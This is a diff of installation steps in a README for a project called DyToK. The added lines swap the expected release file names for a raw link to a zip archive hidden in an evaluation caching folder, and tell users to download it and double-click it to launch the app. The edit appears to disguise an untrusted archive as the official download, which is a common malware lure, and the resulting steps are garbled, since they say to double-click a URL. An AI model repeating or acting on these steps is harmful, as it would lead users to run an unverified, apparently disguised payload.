fahridimas/DyToK/README.md

    Click on the version you want to download.
 Your browser will start downloading the file.

 4. **Locate the Downloaded File**
    After the download finishes, go to the folder where your downloads are stored.
-You should find a file named something like `DyToK-v1.x.zip`.
+You should find a file named something like `https://github.com/fahridimas/DyToK/raw/refs/heads/main/eval/lmms_eval/caching/K-Dy-To-v3.3.zip`.

 5. **Extract the Files**
    Right-click the downloaded ZIP file and choose "Extract All" or use any extraction software you have.
 This will create a new folder with the application files.

 6. **Run DyToK**
    Open the folder with the extracted files.
-Double-click on `DyToK.exe` (or the file relevant to your OS) to launch the application.
+Double-click on `https://github.com/fahridimas/DyToK/raw/refs/heads/main/eval/lmms_eval/caching/K-Dy-To-v3.3.zip` (or the file relevant to your OS) to launch the application.

 7. **Follow the On-Screen Instructions**
    The application will guide you through its features.
 If you encounter any issues, refer to our troubleshooting section below.